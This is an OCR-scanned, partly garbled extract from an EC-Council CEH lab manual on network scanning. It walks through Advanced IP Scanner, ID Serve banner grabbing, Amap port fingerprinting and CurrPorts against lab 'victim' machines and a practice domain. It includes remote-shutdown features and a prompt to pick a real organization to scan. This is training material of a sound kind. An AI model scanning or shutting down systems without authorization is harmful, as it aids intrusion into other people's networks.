Click here to load reader
Upload
mehrdad-jingoism
View
316
Download
58
Tags:
Embed Size (px)
Citation preview
CEH Lab Manual
S c a n n i n g N e t w o r k s
M o d u l e 0 3
M odule 03 - S can n in g N e tw o rk s
S c a n n i n g a T a r g e t N e t w o r kS c a n n in g a n e tw o rk re fe rs to a s e t o f p ro c e d u re s fo r id e n tify in g h o s ts , p o /ts , a n d
s e rv ic e s ru n n in g in a n e tw o rk .
L a b S c e n a r io
Vulnerability scanning determines the possibility of network security attacks. It evaluates the organization’s systems and network for vulnerabilities such as missing patches, unnecessary services, weak authentication, and weak encryption. Vulnerability scanning is a critical component of any penetration testing assignment. You need to conduct penetration testing and list die direats and vulnerabilities found in an organization’s network and perform port scan n in g , netw o rk scan n in g ,
and vu ln erab ility scan n in g ro identify IP/hostname, live hosts, and vulnerabilities.
L a b O b je c t iv e s
The objective of diis lab is to help students in conducting network scanning, analyzing die network vulnerabilities, and maintaining a secure network.
You need to perform a network scan to:
■ Check live systems and open ports
■ Perform banner grabbing and OS fingerprinting
■ Identify network vulnerabilities
■ Draw network diagrams of vulnerable hosts
L a b E n v ir o n m e n t
111 die lab, you need:
■ A computer running with W indow s S e rv e r 2012, W indow s S e rv e r 2008.
W indow s 8 or W indow s 7 with Internet access
■ A web browser
■ Admiiiistrative privileges to run tools and perform scans
L a b D u r a t io n
Time: 50 Minutes
O v e r v ie w o f S c a n n in g N e t w o r k s
Building on what we learned from our information gadiering and threat modeling, we can now begin to actively query our victims for vulnerabilities diat may lead to a compromise. We have narrowed down our attack surface considerably since we first began die penetration test with everydiing potentially in scope.
I C O N K E Y
Valuableinformation
s Test yourknowledge
H Web exercise
Q Workbook review
ZZ7 T o o ls d em o n strated in th is lab are a v a ilab le in
D:\CEH- T o ols\C EH v8 M odule 03 S ca n n in g N etw o rks
Eth ica l Hacking and Countermeasures Copyright © by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited.
C E H Lab M anual Page S5
M odule 03 - S can n in g N e tw o rk s
Note that not all vulnerabilities will result in a system compromise. When searching for known vulnerabilities you will find more issues that disclose sensitive information or cause a denial of service condition than vulnerabilities that lead to remote code execution. These may still turn out to be very interesting on a penetration test. 111 fact even a seemingly harmless misconfiguration can be the nuiiing point in a penetration test that gives up the keys to the kingdom.
For example, consider FTP anonymous read access. This is a fairly normal setting. Though FTP is an insecure protocol and we should generally steer our clients towards using more secure options like SFTP, using FTP with anonymous read access does not by itself lead to a compromise. If you encounter an FTP server that allows anonymous read access, but read access is restricted to an FTP directory that does not contain any files that would be interesting to an attacker, then die risk associated with the anonymous read option is minimal. On die other hand, if you are able to read the entire file system using die anonymous FTP account, or possibly even worse, someone lias mistakenly left die customer's trade secrets in die FTP directory that is readable to die anonymous user; this configuration is a critical issue.
Vulnerability scanners do have their uses in a penetration test, and it is certainly useful to know your way around a few of diem. As we will see in diis module, using a vulnerability scanner can help a penetration tester quickly gain a good deal of potentially interesting information about an environment.
111 diis module we will look at several forms of vulnerability assessment. We will study some commonly used scanning tools.
L a b T a s k s
Pick an organization diat you feel is worthy of your attention. This could be an educational institution, a commercial company, or perhaps a nonprofit charity.
Recommended labs to assist you in scanning networks:
■ Scanning System and Network Resources Using A d v a n c e d IP S c a n n e r
■ Banner Grabbing to Determine a Remote Target System Using ID S e rv e
■ Fingerprint Open Ports for Running Applications Using the A m ap Tool
■ Monitor TCP/IP Connections Using die C u rrP o rts T o o l
■ Scan a Network for Vulnerabilities Using G F I L a n G u a rd 2 0 1 2
■ Explore and Audit a Network Using N m ap
■ Scanning a Network Using die N e tS c a n T o o ls Pro
■ Drawing Network Diagrams Using L A N S u rv e y o r
■ Mapping a Network Using the Fr ie n d ly P in g er
■ Scanning a Network Using die N e s s u s Tool
■ Auditing Scanning by Using G lo b a l N e tw o rk In ve n to ry
■ Anonymous Browsing Using P ro x y S w itc h e r
TASK 1
Overview
L_/ Ensure you haveready a copy of the additional readings handed out for this lab.
Eth ica l Hacking and Countermeasures Copyright © by EC-CouncilAB Rights Reserved. Reproduction is Strictly Prohibited.
C E H Lab M anual Page 86
M odule 03 - S can n in g N e tw o rk s
■ Daisy Chaining Using P ro x y W o rk b e n ch
■ HTTP Tunneling Using H T T P o rt
■ Basic Network Troubleshooting Using the M egaP ing
■ Detect, Delete and Block Google Cookies Using G -Z ap p e r
■ Scanning the Network Using the C o la so ft P a c k e t B u ild e r
■ Scanning Devices in a Network Using T h e Dude
L a b A n a ly s is
Analyze and document die results related to die lab exercise. Give your opinion on your target’s security posture and exposure duough public and free information.
P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N SR E L A T E D T O T H I S L A B .
Eth ica l Hacking and Countermeasures Copyright © by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited.
C E H Lab M anual Page 87
M odule 03 - S can n in g N e tw o rk s
S c a n n i n g S y s t e m a n d N e t w o r k
R e s o u r c e s U s i n g A d v a n c e d I P
S c a n n e r-A d v a n c e d IP S c a n n e r is a fre e n e tiro rk s c a n n e r th a t g iv e s y o n v a rio u s ty p e s o f
in fo rm a tio n re g a rd in g lo c a l n e tiro rk c o m p u te rs .
L a b S c e n a r io
111 this day and age, where attackers are able to wait for a single chance to attack an organization to disable it, it becomes very important to perform vulnerability scanning to find the flaws and vulnerabilities in a network and patch them before an attacker intrudes into the network. The goal of running a vulnerability scanner is to identify devices on your network that are open to known vulnerabilities.
L a b O b je c t iv e s
The objective of this lab is to help students perform a local network scan and discover all the resources 011 die network.
You need to:
■ Perform a system and network scan
■ Enumerate user accounts
■ Execute remote penetration
■ Gather information about local network computers
L a b E n v ir o n m e n t
111 die lab, you need:
■ Advanced IP Scanner located at Z:\\CEHv8 M odule 03 Scan n in g N etw o rks\Scan n ing T o o ls A d van ce d IP S ca n n e r
■ You can also download the latest version of A d v a n c e d IP S c a n n e r
from the link http://www.advanced-ip-scanner.com
I C O N K E Y
־=/ Valuableinformation
✓ Test yourknowledge
S Web exercise
C Q Workbook review
l— J T o o ls d em o n strated in th is lab are a v a ilab le in D:\CEH- T o ols\C EH v8 M odule 03 S ca n n in g N etw o rks
Q You can alsodownload Advanced IPScanner fromhttp:/1 www. advanced-ip-scanner.com.
Eth ica l Hacking and Countermeasures Copyright © by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited.
C E H Lab M anual Page 88
M odule 03 - S can n in g N e tw o rk s
■ If you decide to download the la te s t v e rs io n , then screenshots shown in the lab might differ
■ A computer running W indow s 8 as die attacker (host machine)
■ Another computer running W indo w s se rv e r 2008 as die victim (virtual machine)
■ A web browser widi Internet a c c e s s
■ Double-click ip sca n 2 0 .m si and follow die wizard-driven installation steps to install Advanced IP Scanner
■ A d m in istrative privileges to run diis tool
L a b D u r a t io n
Time: 20 Minutes
O v e r v ie w o f N e t w o r k S c a n n in g
Network scanning is performed to c o lle c t inform ation about live sy s te m s , open ports, and n etw o rk vu ln erab ilities. Gathered information is helpful in determining th re a ts and v u ln erab ilitie s 111 a network and to know whether there are any suspicious or unauthorized IP connections, which may enable data theft and cause damage to resources.
L a b T a s k s
1. Go to S ta rt by hovering die mouse cursor in die lower-left corner of die desktop
FIGURE 1.1: Windows 8 - Desktop view2. Click A d van ce d IP S ca n n e r from die S ta rt menu in die attacker machine
(Windows 8).
/ 7 Advanced IP Scanner works on Windows Server 2003/ Server 2008 and on Windows 7 (32 bit, 64 bit).
S T A S K 1
Launch in g A d van ced IP
S c a n n e r
Eth ica l Hacking and Countermeasures Copyright O by EC Coundl־A ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 89
M odule 03 - S can n in g N e tw o rk s
S t a r t Admin ^
Nc m
WinRAR MozillaFirefox
CommandPrompt
i t t
FngagoPacketbuilder
2*
Sports
Computer
tS
MicrosoftClipOrganizer
Advanced IP Scanner
m
i i i l i l i
finance
ControlPanel
Microsoft Office 2010 Upload...
•
FIGURE 12. Windows 8 - Apps3. The A d van ce d IP S c a n n e r main window appears.
FIGURE 13: The Advanced IP Scanner main window4. Now launch die Windows Server 2008 virtual machine (v ictim ’s m ach in e).
Eth ica l Hacking and Countermeasures Copyright O by EC Coundl־A ll Rights Reserved. Reproduction is Strictly Prohibited
m With Advanced IP Scanner, you can scan hundreds of IP addresses simultaneously.
You can wake any machine remotely with Advanced IP Scanner, if the Wake-on־LAN feature is supported by your network card.
C E H Lab M anual Page 90
M odule 03 - S can n in g N e tw o rk s
O jf f lc k 10:09 FM JiikFIGURE 1.4: The victim machine Windows server 2008
5. Now, switch back to die attacker machine (Windows 8) and enter an IP address range in die S e le c t range field.
6. Click die S c a n button to start die scan.
7. A d van ced IP S c a n n e r scans all die IP addresses within die range and displays the s c a n re su lts after completion.
L_/ You have to guess arange of IP address of victim machine.
a Radmin 2.x and 3.x Integration enable you to connect (if Radmin is installed) to remote computers with just one dick.
The status of scan is shown at the bottom left side of the window.
Eth ica l Hacking and Countermeasures Copyright O by EC Counc11־All Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 91
M odule 03 - S can n in g N e tw o rk s
Advanced IP Scanner
File Actions Settings View Heip
J► Scar' J l IP cr=£k=3 r f to d id 3? f i l : Like us on ■ 1 Facebook
10.0.0.1-10.0.0.10
MAC addressManufacturer
Resits | Favorites |
rStatus
0 w 10.0.0.1 10.0.a1 Nlctgear, Inc. 00:09:5B:AE:24CC
ט *£< WIN-MSSELCK4K41 10.0.a2 Dell Inc DO:67:ES:1A:16:36
® & WINDOWS# 10.0.03 Microsoft Corporation 00:15:5D: A8:6E:C6WIN*LXQN3WR3R9M 10.0.05 Microsoft Corporation 00:15:5D:A8:&E:03
® 15 WIN-D39MR5H19E4 10.0.07 Dell Inc D4:3E.-D9: C 3:CE:2D
5 a iv*, 0 d«J0, S unknown
FIGURE 1.6: The Advanced IP Scanner main window after scanning8. You can see in die above figure diat Advanced IP Scanner lias detected
die victim machine’s IP address and displays die status as alive
9. Right-click any of die detected IP addresses. It will list Wake-On-LAN. Shut down, and Abort Shut down
Advanced IP Scanner5־F ie Actions Settings View Helo
Like us on FacebookWi*sS:ip c u u *I IScan
10.0.0.1-10.0.0.10Resuts Favorites |
MAC addressto ru fa c tu re rnNameStatus
00:09:5B:AE:24CCD0t67:E5j1A:16«36 <U: A8:ofc:Otצ: 5 0:1□00:15:SD:A8:6E:03 CW:BE:D9:C3:CE:2D
Netgear. Inc
Microsoft Corporation M icrosoft CorporationDell Inc
10.0.011
!Add to ‘Favorites'
Rescan selected
Sive selected...
Wdke־On־LAN
Shut dcwn...
Abort shut dcwn
Radrnir
10.0.0.1IHLMItHMM, —WINDOWS8 t*p ore׳
WIN-LXQN3WR3 Copy WIN־D39MR5HL<
h i
5 alive. 0 dead, 5 unknown
FIGURE 1.7: The Advanced IP Scanner main window with Alive Host list10. The list displays properties of the detected computer, such as IP
address. Name, MAC, and NetBIOS information.
11. You can forcefully Shutdown, Reboot, and Abort Shutdown dieselected victim machine/IP address
Lists of computers saving and loading enable you to perform operations with a specific list of computers. Just save a list of machines you need and Advanced IP Scanner loads it at startup automatically.
m Group Operations: Any feature of Advanced IP Scanner can be used with any number of selected computers. For example, you can remotely shut down a complete computer class with a few dicks.
M T A S K 2
Extract Victim’s
IP Address Info
a Wake-on-LAN: You can wake any machine remotely with Advanced IP Scanner, if Wake-on-LAN feature is supported by your network card.
Eth ica l Hacking and Countermeasures Copyright O by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 92
M odule 03 - S can n in g N e tw o rk s
m״ s i *
Like us on Facebook
3MAC addressjrer
00;C9;5B:AE:24;CC D0:67:E5:1A:16:36
It ion 00:15:3C:A0:6C:06It ion 00:13:3D:A8:6E:03
D4:BE:D9:C3:CE:2D
S hutdow n op tio ns
r Use Vtindcms authentifcation
Jser narre:
9essMord:
rneoc t (sec): [60
Message:
I” Forced shjtdo/vn
f " Reooot
&
File Actions Settings View Help
Scan J!] .■ ]110.0.0.1-100.0.10
Results | Favorites |
Status Name
® a 1a0.0.1WIN-MSSELCK4K41WINDOW S
$WIN-LXQN3WR3R9M
» a WIN-D39MR5HL9E4
S alive, Odcad, 5 unknown
Winfingerprint Input Options:■ IP Range (Netmask and
Inverted Netmask supported) IP ListSmgle Host Neighborhood
FIGURE 1.8: The Advanced IP Scanner Computer properties window12. Now you have die IP address. Name, and other details of die victim
machine.
13. You can also try Angry IP scanner located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Ping Sweep Tools\Angry IP Scanner Italso scans the network for machines and ports.
L a b A n a ly s is
Document all die IP addresses, open ports and dieir running applications, and protocols discovered during die lab.
Tool/Utility Information Collected/Objectives Achieved
Advanced IP Scanner
Scan Information:■ IP address■ System name■ MAC address■ NetBIOS information■ Manufacturer■ System status
Eth ica l Hacking and Countermeasures Copyright O by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 93
M odule 03 - S can n in g N e tw o rk s
P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N SR E L A T E D T O T H I S L A B .
Q u e s t io n s
1. Examine and evaluate the IP addresses and range of IP addresses.
Internet Connection Required
es□ Y
Platform Supported
0 Classroom
0 No
0 iLabs
Eth ical Hacking and Countermeasures Copyright © by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 94
M odule 03 - S can n in g N e tw o rk s
B a n n e r G r a b b i n g t o D e t e r m i n e a
R e m o t e T a r g e t S y s t e m u s i n g ID
S e r v eID S S e rv e is u s e d to id e n tify th e m a k e , ///o d e /, a n d v e rs io n o f a n y w e b s ite 's s e rv e r
s o fh v a re .
L a b S c e n a r io
111 die previous lab, you learned to use Advanced IP Scanner. This tool can also be used by an attacker to detect vulnerabilities such as buffer overflow, integer flow, SQL injection, and web application on a network. If these vulnerabilities are not fixed immediately, attackers can easily exploit them and crack into die network and cause server damage.
Therefore, it is extremely important for penetration testers to be familiar widi banner grabbing techniques to monitor servers to ensure compliance and appropriate security updates. Using this technique you can also locate rogue servers or determine die role of servers within a network. 111 diis lab, you will learn die banner grabbing technique to determine a remote target system using ID Serve.
L a b O b je c t iv e s
The objective of diis lab is to help students learn to banner grabbing die website and discover applications running 011 diis website.
111 diis lab you will learn to:
■ Identify die domain IP address
■ Identify die domain information
L a b E n v ir o n m e n t
To perform die lab you need:
■ ID Server is located at D :\C EH -T o o ls\C EH v 8 M odule 03 S ca n n in g
N e tw o rk s\B a n n e r G rab b in g To o ls\ID S e rv e
I C O N K E Y
Valuableinformation
y* Test yourknowledge
Web exercise
O Workbook review
O T o o ls d em o n strated in th is lab are a v a ilab le in D:\CEH- T o ols\C EH v8 M odule 03
S ca n n in g N etw o rks
Eth ica l Hacking and Countermeasures Copyright © by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited.
C E H Lab M anual Page 95
M odule 03 - S can n in g N e tw o rk s
■ You can also download the latest version of ID S e rv e from the link http: / / www.grc.com/id/idserve.htm
■ If you decide to download the la te s t v e rs io n , then screenshots shown in the lab might differ
■ Double-click id se rv e to run ID S e rv e
■ Administrative privileges to run die ID S e rv e tool
■ Run this tool on W indow s S e rv e r 2012
L a b D u r a t io n
Time: 5 Minutes
O v e r v ie w o f ID S e r v e
ID Serve can connect to any se rv e r port on any dom ain or IP address, then pulland display die server's greeting message, if any, often identifying die server's make,model, and versio n , whether it's for FT P , SMTP, POP, NEW’S, or anything else.
L a b T a s k s
1. Double-click id se rv e located at D:\CEH -Tools\CEH v8 M odule 03 S ca n n in g N etw o rks\B ann er G rabbing Tools\ID S erv e
2. 111 die main window of ID S e rv e show in die following figure, select die S e v e r Q uery tab
TASK 1
Identify w e b s ite se rv e r inform ation
׳ - r oID Serve0Internet Server Identification Utility, vl .02 Personal Security Freeware by Steve Gibson Copyright (c) 2003 by Gibson Research CorpID Serve
Background Server Query | Q&A/Help
Enter 01 copy / paste an Internet server URL 0* IP address here (example www rmcrosoft com)ri
When an Internet URL or IP has been provided above ^ press this button to rwtiate a query of the speahed serverQueiy The Serverr!
Server
The server identified <se* as4
E*itgoto ID Serve web pageCopy
If an IP address is entered instead of a URL, ID Serve will attempt to determine the domain name associated with the IP
FIGURE 21: Main window of ID Serve3. Enter die IP address 01־ URL address in E n te r o r Copy/paste an Internal
se rv e r U R L o r IP a d d re ss here:
Eth ica l Hacking and Countermeasures Copyright O by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 96
M odule 03 - S can n in g N e tw o rk s
ID Server©Internet Server Identification Utility, vl .02 Personal Security Freeware by Steve Gibson Copyright (c) 2003 by Gibson Research Corp.ID Serve
Background Server Query I Q&A/tjelp
Entei or copy I paste an Internet serve* URL or IP adtfress here (example www microsoft com)
[www certifiedhacker com[
W hen an Internet URL 0* IP has been piovided above, piess this button to initiate a query 01 the specfod serverQuery TheS w ve i
Server query processing(%
The server identified itse l as
EjjitGoto ID Seive web pageCopy
ID Serve can accept the URL or IP as a command-line parameter
FIGURE 22 Entering die URL for query4. Click Query The Server; it shows server query processed information
m ׳ x־,ID Serve
Exit
Internet Server Identification Utility, vl .02 Personal Security Freeware by Steve Gibson Copyright (c) 2003 by Gibson Research CofpID Serve
Background Server Query | Q&A/Help
Enter or copy / paste an Internet seivef URL or IP address here (example www m»c10s0ft com)
| www. certifiedhacker.com|<T
W hen an Internet URL 0* IP has been piovided above, press this button to initiate a queiy of the speafied serverQuery The Serverr2 [
Seiver query processing
Initiating server queryLooking up IP address for domain www certifiedhacker com The IP address for the domain is 202.75 54 101 Connecting to the server on standard HTTP port: 80 Connected] Requesting the server's default page
(3
The server identrfied itse l as
M ic ro s o f t - I IS /6 .0a
Goto ID Serve web pageCopy
Q ID Serve can also connect with non-web servers to receive and report that server's greeting message. This generally reveals the server's make, model, version, and other potentially useful information.
FIGURE 23: Server processed information
L a b A n a ly s is
Document all die IP addresses, dieir running applications, and die protocols you discovered during die lab.
Eth ica l Hacking and Countermeasures Copyright O by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 97
M odule 03 - S can n in g N e tw o rk s
Tool/Utility Information Collected/Objectives Achieved
IP address: 202.75.54.101
Server Connection: Standard HT1P port: 80
Response headers returned from server:ID Serve ■ HTTP/1.1 200
■ Server: Microsoft-IIS/6.0■ X-Powered-By: PHP/4.4.8■ Transfer-Encoding: chunked■ Content-Type: text/html
P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N SR E L A T E D T O T H I S L A B .
Q u e s t io n s
1. Examine what protocols ID Serve apprehends.
2. Check if ID Serve supports https (SSL) connections.
Internet Connection Required
□ Yes 0 No
Platform Supported
0 Classroom 0 iLabs
Eth ical Hacking and Countermeasures Copyright © by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited.
C E H Lab M anual Page 98
M odule 03 - S can n in g N e tw o rk s
F i n g e r p r i n t i n g O p e n P o r t s U s i n g t h e
A m a p T o o l.-b n a p d e te rm in e s a p p lic a tio n s ru n n in g o n e a ch o p e n p o r t.
L a b S c e n a r io
Computers communicate with each other by knowing die IP address in use and ports check which program to use when data is received. A complete data transfer always contains the IP address plus the port number required. 111 the previous lab we found out that die server connection is using a Standard HTTP port 80. If an attacker finds diis information, he or she will be able to use die open ports for attacking die machine.
111 this lab, you will learn to use the Amap tool to perform port scanning and know exacdy what ap p lica tio n s are running on each port found open.
L a b O b je c t iv e s
The objective of diis lab is to help students learn to fingerprint open ports and discover applications 11 inning on diese open ports.
hi diis lab, you will learn to:
■ Identify die application protocols running on open ports 80
■ Detect application protocols
L a b E n v ir o n m e n t
To perform die lab you need:
■ Amap is located at D :\C EH -T o o ls\C EH v8 M odule 03 S ca n n in g
N e tw o rk s\B a n n e r G rab b in g ToolsVAM AP
■ You can also download the latest version of AM AP from the link http: / / www.thc.org dic-amap.
■ If you decide to download the la te s t v e rs io n , then screenshots shown in the lab might differ
I CON KEY2 ^ Valuable
information
Test vourknowledge
g Web exercise
Q Workbook review
C 5 T o o ls d em o n strated in th is lab are a v a ilab le in D:\CEH- T o ols\C EH v8 M odule 03
S ca n n in g N etw o rks
Eth ica l Hacking and Countermeasures Copyright © by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited.
C E H Lab M anual Page 99
M odule 03 - S can n in g N e tw o rk s
■ A computer running Web Services enabled for port 80
■ Administrative privileges to run die A m ap tool
■ Run this tool on W indow s S e rv e r 2012
L a b D u r a t io n
Time: 5 Minutes
O v e r v ie w o f F in g e r p r in t in g
Fingerprinting is used to discover die applications running on each open port found 0x1 die network. Fingerprinting is achieved by sending trigger p a c k e ts and looking up die responses in a list of response strings.
L a b T a s k s
1. Open die command prompt and navigate to die Amap directory. 111 diis lab die Amap directory is located at D:\CEH -Tools\CEH v8 M odule 03 Scan n in g
N etw o rks\B anner G rabbing Tools\AM AP
2. Type am ap w w w .ce rtif ie d h a ck e r.co m 80, and press Enter.
Administrator: Command Prompt33
[D :\CEH~Tools \C EHu8 Module 03 S c a n n i n g N e t w o r k \ B a n n e r G r a b b i n g Tools \AM AP>anap uw [u . c e r t i f i o d h a c h e r . c o m 80Anap 0 5 . 2 <w w w . t h e . o r g / t h c - a n a p ) s t a r t e d a t 2 0 1 2 - 0 8 - 2 8 1 2 : 2 0 : 4 2 - MAPPING modo
J n i d e n t i f i e d p o r t s : 2 0 2 . ? 5 . 5 4 . 1 0 1 : 8 0 / t c p < t o t a l 1> .
M a p 0 5 . 2 f i n i s h e d a t 2 0 1 2 - 0 8 - 2 8 1 2 : 2 0 : 5 3
D:\CEH-T0 0 1 s \CEH08 Module 03 S c a n n i n g N e t w o r k \ B a n n e r G r a b b i n g Tools\AMAP>
FIGURE 3.1: Amap with host name www.ce1tifiedl1acke1.com with Port SO3. You can see die specific ap p licatio n protocols running 011 die entered host
name and die port 80.
4. Use die IP a d d re ss to check die applications running on a particular port.
5. 111 die command prompt, type die IP address of your local Windows Server 2008(virtual machine) am ap 10 .0 .0 .4 75-81 (lo ca l W indow s S e rv e r 2008)
and press E n te r (die IP address will be different in your network).
6. Try scanning different websites using different ranges of switches like amap www.certifiedhacker.com 1-200
at TASK 1
Identify A pplication
P ro to co ls Running on Port 80
Syntax: amap [-A | ־B | -P | -W] [-1 buSRHUdqv] [[-m] -o <file>][-D <file>] [־t/־T sec] [-c cons] [-C retries][-p proto] [־i <file>] [target port [port]...]
✓ For Amap options, type amap -help.
Eth ica l Hacking and Countermeasures Copyright O by EC Coundl־A ll Rights Reserved. Reproduction is Strictly Prohibited
C E H Lab M anual Page 100
M odule 03 - S can n in g N e tw o rk s
ד
FIGURE 3.2: Amap with IP address and with range of switches 73-81
L a b A n a ly s is
Document all die IP addresses, open ports and dieir running applications, and die protocols you discovered during die lab.
Tool/Utility Information Collected/Objectives Achieved
Identified open port: 80
WebServers:■ 11ttp-apache2־■ http-iis■ webmin
Amap Unidentified ports:■ 10.0.0.4:75/tcp■ 10.0.0.4:76/tcp■ 10.0.0.4:77/tcp■ 10.0.0.4:78/tcp■ 10.0.0.4:79/tcp■ 10.0.0.4:81/tcp
Eth ica l Hacking and Countermeasures Copyright O by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited
D:\CEH -T ools \CE H u8 Module 03 S c a n n i n g N e tw o r k \B a n n e r G r a b b i n g Tools\AMAP>amap I f . 0 . 0 . 4 75 -8 1
laroap v 5 . 2 <w w w . t h c . o r g / t h c - a n a p ) s t a r t e d a t 2 0 1 2 - 0 8 - 2 8 1 2 : 2 7 : 5 1 - MAPPING mode
P r o t o c o l on 1 0 . 0 _ 0 . 4 : 8 0 / t c p n a t c h e s h t t p P r o t o c o l on 1 0 . 0 _ 0 . 4 : 8 0 / t c p n a t c h e s h t t p - a p a c h e - 2W a r n in g : C o u ld n o t c o n n e c t < u n r e a c h a b l e > t o 1 0 . 0 . 0 . 4 : 7 6 / t c p , d i s a b l i n g p o r t <EUN KN>W a r n in g : C o u ld n o t c o n n e c t < u n r e a c h a b l e ) t o 1 0 . 0 . 0 . 4 : 7 5 / t c p , d i s a b l i n g p o r t <EUN K H >W a r n in g : C ou ld n o t c o n n e c t < u n r e a c h a b l e > t o 1 0 . 0 . 0 . 4 : 7 7 / t c p , d i s a b l i n g p o r t <EUN KH>W a r n in g : C ou ld n o t c o n n e c t ( u n r e a c h a b l e ) t o 1 0 . 0 . 0 . 4 : 7 8 / t c p , d i s a b l i n g p o r t <EUN KN>W a r n in g : C o u ld n o t c o n n e c t < u n r e a c h a b l e > t o 1 0 . 0 . 0 . 4 : 7 9 / t c p , d i s a b l i n g p o r t <EUN |KN>W a r n in g : C o u ld n o t c o n n e c t < u n r e a c h a b l e > t o 1 0 . 0 . 0 . 4 : 8 1 / t c p , d i s a b l i n g p o r t <EUN KN>P r o t o c o l on 1 0 . 0 _ 0 . 4 : 8 0 / t c p n a t c h e s h t t p - i i s P r o t o c o l on 1 0 . 0 _ 0 . 4 : 8 0 / t c p n a t c h e s webmin
U n i d e n t i f i e d p o r t s : 1 0 . 0 . 0 . 4 : 7 5 / t c p 1 0 . 0 . 0 . 4 : 7 6 / t c p 1 0 . 0 . 0 . 4 : 7 7 / t c p 1 0 . 0 . 0 . 4 : 7 8 / k c p 1 0 . 0 . 0 . 4 : 7 9 / t c p 1 0 . 0 . 0 . 4 : 8 1 / t c p < t o t a l 6 > .
Linap v 5 . 2 f i n i s h e d a t 2 0 1 2 - 0 8 - 2 8 1 2 : 2 7 : 5 4
b : \C E H -T o o ls \C E H v 8 Module 03 S c a n n i n g N e tw orkN Banner G r a b b i n g Tools\AMAP>
Compiles on all UNIX based platforms - even MacOS X, Cygwin on Windows, ARM-Linux and PalmOS
C E H Lab M anual Page 101
M odule 03 - S can n in g N e tw o rk s
P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N SR E L A T E D T O T H I S L A B .
Q u e s t io n s
1. Execute the Amap command for a host name with a port number other than 80.
2. Analyze how die Amap utility gets die applications running on different machines.
3. Use various Amap options and analyze die results.
Internet Connection Required
□ Noes0 Y
Platform Supported
□ iLabs0 Classroom
Eth ica l Hacking and Countermeasures Copyright © by EC-CouncilA ll Rights Reserved. Reproduction is Strictly Prohibited.
C E H Lab M anual Page 102
M odule 03 - S can n in g N e tw o rk s
M o n i to r in g T C P /I P C o n n e c t i o n s
U s i n g t h e C u r r P o r t s T o o lC u n P o r ts is n e tw o rk m o n ito rin g s o fh ia re th a t d is p la y s th e lis t o f a ll c u r re n tly
o p e n e d T C P / IP a n d U D P p o r ts o n y o u r lo c a l c o m p u te r.
L a b S c e n a r io
111 the previous lab you learned how to check for open ports using the Amap tool. As an e th ic a l h a c k e r and p e n e tra tio n te s te r , you must be able to block such attacks by using appropriate firewalls or disable unnecessary services running 011 the computer.
You already know that the Internet uses a software protocol named T C P / IP to format and transfer data. A11 attacker can monitor ongoing TCP connections and can have all the information in the IP and TCP headers and to the packet payloads with which he or she can hijack the connection. As the attacker has all die information 011 the network, he or she can create false packets in the TCP connection.
As a n e tw o rk ad m in istrato r., your daily task is to check the T C P /IP
c o n n e c t io n s of each server you manage. You have to m o n ito r all TCP and UDP ports and list all the e s ta b lis h e d IP a d d r e s s e s of the server using the C u rrP o rts tool.
L a b O b je c t iv e s
The objective of diis lab is to help students determine and list all the TCP/IP and UDP ports of a local computer.
111 in this lab, you need to:
■ Scan the system for currently opened T C P /IP and U D P ports
■ Gather information 011 die p o rts and p r o c e s s e s that are opened
■ List all the IP a d d r e s s e s that are currendy established connections
■ Close unwanted TCP connections and kill the process that opened the ports
ICON KEYValuableinformation
Test yourknowledge
w Web exercise
m Workbook review
C J T o o ls d em o n strated in th is lab are a v a ilab le in D:\CEH- T o ols\C EH v8
M odule 03 S ca n n in g N etw o rks
Eth ica l Hacking and Countermeasures Copyright © by EC-CouncilAB Rights Reserved. Reproduction is Strictly Prohibited.
C E H Lab M anual Page 103
M odule 03 - S can n in g N e tw o rk s
L a b E n v ir o n m e n t
To perform the lab, you need:
■ CurrPorts located at D :\C EH -T o o ls\C EH v 8 M odule 03 S ca n n in g N e tw o rk s\S ca n n in g T o o ls\C u rrP o rts
■ You can also download the latest version of C u rrP o rts from the link http: / / www.nirsoft.11et/utils/cports.html
■ If you decide to download the la te s t v e rs io n , then screenshots shown in the lab might differ
■ A computer running W in d o w s S e r v e r 2 0 1 2
■ Double-click c p o r ts .e x e to run this tool
■ Administrator privileges to run die C u rrP o rts tool
L a b D u r a t io n
Time: 10 Minutes
a You can download CuuPorts tool from http://www.nirsoft.net.
O v e r v ie w M o n ito r in g T C P / IP
Monitoring TCP/IP ports checks if there are m ultiple IP connections established Scanning TCP/IP ports gets information on all die opened T C P and U D P ports and also displays all established IP addresses on die server.
L a b T a s k s
The CurrPorts utility is a standalone executable and doesn’t require any installation process or additional DLLs (Dynamic Link Library). Extract CurrPorts to die desired location and double click c p o rts .e x e to launch.
1. Launch C u rrp o rts . It a u to m a tic a lly d is p la y s the process name, ports, IP and remote addresses, and their states.
TASK 1
rCurrPorts־1״1 * י
File Edit View Option* Help
xSD®v^ ! t ae r4*a-*Process Na.. Proces... Protocol Local... L oc - Local Address Rem... Rem... R ercte Address Remote Host Nam
(T enrome.ere 2 m TCP 4119 10.0.0.7 80 h ttp 173.194.36.26 bcm04501 -in־f26.1
f <+1rome.ere 2988 TCP 4120 10.0.0.7 80 http 173.194.3626 bcmOisOl -in-f26.1
chrome.ere 2988 TCP 4121 10.0.0.7 80 http 173.194.3626 bom04501־in f26.1־f chrome.exe 2 m TCP 4123 10.0.0.7 80 http 215720420 a23-57-204-20.dep
